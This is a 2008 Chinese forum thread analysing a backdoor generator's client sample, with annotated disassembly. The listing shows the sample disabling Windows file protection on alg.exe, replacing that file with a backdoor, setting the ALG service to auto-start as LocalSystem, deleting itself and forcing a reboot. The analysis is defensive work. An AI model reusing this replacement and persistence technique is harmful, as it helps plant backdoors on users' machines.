点饭的百度空间
#1 【黑失败】在"微点"面前果然很失败



好久不玩样本了,无聊去黑基转转,搞了一头“黑失败”的生成器下来,说明上写得很强大,猜想它的蓝屏不是杀子系统就是杀winlogon,有损本本寿命,所以用“重新启动”选项生成了一个,一看没壳,汇编写的。


004011BB |. 8945 E8 mov dword ptr ss:[ebp-18],eax
004011BE |. 53 push ebx ; /WideBufSize
004011BF |. FF75 E8 push dword ptr ss:[ebp-18] ; |WideCharBuf
004011C2 |. 6A FF push -1 ; |StringSize = FFFFFFFF (-1.)
004011C4 |. 68 84344000 push 复件_复?00403484 ; |StringToMap = "C:\windows\system32\alg.exe"
004011C9 |. 6A 00 push 0 ; |Options = 0
004011CB |. 6A 00 push 0 ; |CodePage = CP_ACP
004011CD |. E8 4C030000 call <jmp.&kernel32.MultiByteToWideChar> ; \MultiByteToWideChar
004011D2 |. 68 2E344000 push 复件_复?0040342E ; /FileName = "sfc_os.dll"
004011D7 |. E8 2A030000 call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
004011DC |. 6A 05 push 5 ; /ProcNameOrOrdinal = #5
004011DE |. 50 push eax ; |hModule
004011DF |. E8 0A030000 call <jmp.&kernel32.GetProcAddress> ; \GetProcAddress
004011E4 |. 8945 E4 mov dword ptr ss:[ebp-1C],eax
004011E7 |. 6A FF push -1
004011E9 |. FF75 E8 push dword ptr ss:[ebp-18]
004011EC |. 6A 00 push 0
004011EE |. FF55 E4 call dword ptr ss:[ebp-1C] ;调用SfcFileException对C:\windows\system32\alg.exe去除SFC保护
接着查找自身的3E8资源,释放到%SystemRoot%\system32\目录下并命名为DNA.dll,同理找到资源7D0释放为algdna.exe,接下来:
00401343 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401348 |. 68 84344000 push 复件_复?00403484 ; |Buffer = 复件_复?00403484
0040134D |. E8 A2010000 call <jmp.&kernel32.GetSystemDirectoryA> ; \GetSystemDirectoryA
00401352 |. 68 56344000 push 复件_复?00403456 ; /StringToAdd = "\alg.exe"
00401357 |. 68 84344000 push 复件_复?00403484 ; |ConcatString = "C:\windows\system32\alg.exe"
0040135C |. E8 F3010000 call <jmp.&kernel32.lstrcatA> ; \lstrcatA
00401361 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
00401366 |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
0040136C |. 50 push eax ; |Buffer
0040136D |. E8 82010000 call <jmp.&kernel32.GetSystemDirectoryA> ; \GetSystemDirectoryA
00401372 |. 68 5F344000 push 复件_复?0040345F ; /StringToAdd = "\sdk"
00401377 |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
0040137D |. 50 push eax ; |ConcatString
0040137E |. E8 D1010000 call <jmp.&kernel32.lstrcatA> ; \lstrcatA
00401383 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING
00401385 |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
0040138B |. 50 push eax ; |NewName,"C:\windows\system32\sdk"
0040138C |. 68 84344000 push 复件_复?00403484 ; |ExistingName = "C:\windows\system32\alg.exe"
00401391 |. E8 82010000 call <jmp.&kernel32.MoveFileExA> ; \MoveFileExA,将alg.exe延时搬家到sdk
00401396 |. 6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
00401398 |. 6A 00 push 0 ; |NewName = NULL
0040139A |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
004013A0 |. 50 push eax ; |ExistingName,"C:\windows\system32\sdk"
004013A1 |. E8 72010000 call <jmp.&kernel32.MoveFileExA> ; \MoveFileExA,延时拆房
004013A6 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
004013AB |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
004013B1 |. 50 push eax ; |Buffer
004013B2 |. E8 3D010000 call <jmp.&kernel32.GetSystemDirectoryA> ; \GetSystemDirectoryA
004013B7 |. 68 64344000 push 复件_复?00403464 ; /StringToAdd = "\algdna.exe"
004013BC |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
004013C2 |. 50 push eax ; |ConcatString
004013C3 |. E8 8C010000 call <jmp.&kernel32.lstrcatA> ; \lstrcatA
004013C8 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING
004013CA |. 68 84344000 push 复件_复?00403484 ; |NewName = "C:\windows\system32\alg.exe"
004013CF |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
004013D5 |. 50 push eax ; |ExistingName,"C:\windows\system32\algdna.exe"
004013D6 |. E8 3D010000 call <jmp.&kernel32.MoveFileExA> ; \MoveFileExA,把后门放到拆过房的地基上,重盖房?很勤劳!换个门不可以么?
004013DB |. 68 04010000 push 104 ; /BufSize = 104 (260.)
004013E0 |. 8D85 D0FDFFFF lea eax,dword ptr ss:[ebp-230] ; |
004013E6 |. 50 push eax ; |PathBuffer
004013E7 |. 6A 00 push 0 ; |hModule = NULL
004013E9 |. E8 F4000000 call <jmp.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA
004013EE |. 6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
004013F0 |. 6A 00 push 0 ; |NewName = NULL
004013F2 |. 8D85 D0FDFFFF lea eax,dword ptr ss:[ebp-230] ; |
004013F8 |. 50 push eax ; |ExistingName,"C:\~~\黑失败2008 SP2正式版\复件 复件 客户端.exe"
004013F9 |. E8 1A010000 call <jmp.&kernel32.MoveFileExA> ; \MoveFileExA,喝慢性毒药
然后……(受字数限制未完,接下楼)
2008-7-27 16:42 |
点饭的百度空间
#2
004013FE |. 68 3F000F00 push 0F003F
00401403 |. 6A 00 push 0
00401405 |. 6A 00 push 0
00401407 |. E8 A6000000 call <jmp.&advapi32.OpenSCManagerA>
0040140C |. 8BD8 mov ebx,eax
0040140E |. 68 FF010F00 push 0F01FF
00401413 |. 68 70344000 push 客户端.00403470 ; ASCII "ALG"
00401418 |. 53 push ebx
00401419 |. E8 9A000000 call <jmp.&advapi32.OpenServiceA> ;打开ALG服务
0040141E |. 8BF8 mov edi,eax
00401420 |. 53 push ebx
00401421 |. E8 7A000000 call <jmp.&advapi32.CloseServiceHandle>
00401426 |. 68 04010000 push 104 ; /Length = 104 (260.)
0040142B |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
00401431 |. 50 push eax ; |Destination
00401432 |. E8 05010000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory
00401437 |. 6A 00 push 0 ; /DisplayName = NULL
00401439 |. 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-12C] ; |
0040143F |. 50 push eax ; |Password
00401440 |. 68 74344000 push 客户端.00403474 ; |ServiceStartName = "LocalSystem"
00401445 |. 6A 00 push 0 ; |pDependencies = NULL
00401447 |. 6A 00 push 0 ; |pTagId = NULL
00401449 |. 6A 00 push 0 ; |LoadOrderGroup = NULL
0040144B |. 6A 00 push 0 ; |BinaryPathName = NULL
0040144D |. 6A FF push -1 ; |ErrorControl = SERVICE_NO_CHANGE
0040144F |. 6A 02 push 2 ; |StartType = SERVICE_AUTO_START,改变服务启动类型为自动,之前为手动
00401451 |. 68 20010000 push 120 ; |ServiceType = SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
00401456 |. 57 push edi ; |hService
00401457 |. E8 3E000000 call <jmp.&advapi32.ChangeServiceConfigA>; \ChangeServiceConfigA
0040145C |. 57 push edi
0040145D |. E8 3E000000 call <jmp.&advapi32.CloseServiceHandle>
最后拿到“自杀”所需的关机特权令牌,准备开机后自杀,^_^
004010BC /$ 55 push ebp
004010BD |. 8BEC mov ebp,esp
004010BF |. 83C4 EC add esp,-14
004010C2 |. 8D4D FC lea ecx,dword ptr ss:[ebp-4]
004010C5 |. E8 12040000 call <jmp.&kernel32.GetCurrentProcess> ; [GetCurrentProcess
004010CA |. 51 push ecx ; /phToken
004010CB |. 68 FF010F00 push 0F01FF ; |DesiredAccess = STANDARD_RIGHTS_REQUIRED|TOKEN_ASSIGN_PRIMARY|TOKEN_DUPLICATE|TOKEN_IMPERSONATE|TOKEN_QUERY|TOKEN_QUERY_SOURCE|TOKEN_ADJUST_PRIVILEGES|TOKEN_ADJUST_GROUPS|TOKEN_ADJUST_DEFAULT|100
004010D0 |. 50 push eax ; |hProcess
004010D1 |. E8 D6030000 call <jmp.&advapi32.OpenProcessToken> ; \OpenProcessToken
004010D6 |. C745 EC 01000000 mov dword ptr ss:[ebp-14],1
004010DD |. 8D45 F0 lea eax,dword ptr ss:[ebp-10]
004010E0 |. 50 push eax ; /pLocalId
004010E1 |. 68 00344000 push 客户端.00403400 ; |Privilege = "SeShutdownPrivilege"
004010E6 |. 6A 00 push 0 ; |SystemName = NULL
004010E8 |. E8 B9030000 call <jmp.&advapi32.LookupPrivilegeValueA> ; \LookupPrivilegeValueA
004010ED |. C745 F8 02000000 mov dword ptr ss:[ebp-8],2
004010F4 |. 6A 00 push 0 ; /pRetLen = NULL
004010F6 |. 6A 00 push 0 ; |pPrevState = NULL
004010F8 |. 6A 10 push 10 ; |PrevStateSize = 10 (16.)
004010FA |. 8D45 EC lea eax,dword ptr ss:[ebp-14] ; |
004010FD |. 50 push eax ; |pNewState
004010FE |. 6A 00 push 0 ; |DisableAllPrivileges = FALSE
00401100 |. FF75 FC push dword ptr ss:[ebp-4] ; |hToken
00401103 |. E8 8C030000 call <jmp.&advapi32.AdjustTokenPrivileges> ; \AdjustTokenPrivileges
00401108 |. 50 push eax
00401109 |. FF75 FC push dword ptr ss:[ebp-4] ; /hObject
0040110C |. E8 AD030000 call <jmp.&kernel32.CloseHandle> ; \CloseHandle
创建自杀条件
00401462 |. E8 55FCFFFF call 客户端.004010BC
00401467 |. 6A 00 push 0 ; /Reserved = 0
00401469 |. 6A 02 push 2 ; |Options = EWX_REBOOT
0040146B |. E8 1E000000 call <jmp.&user32.ExitWindowsEx> ; \ExitWindowsEx
总之很好很强大,在微点面前不愧为“黑失败”,只有自杀功能完成了,这也就是前面代码为什么会以“复件”方式出现的原因了。微点两次报警全部放过,房子也拆了,只不过拆得不是很高明,自杀水平倒是不错,重启后一个病毒进程都没发现,原因见微点日志,^_^。


BY::unknown author
2008-7-27 16:43 |
遥遥遥遥
#3
很好很强大
2008-7-27 18:17 |
点饭的百度空间
2008-11-7 09:33 |
yurong7777777
#5
秀好很欣喜
2008-11-7 17:37 |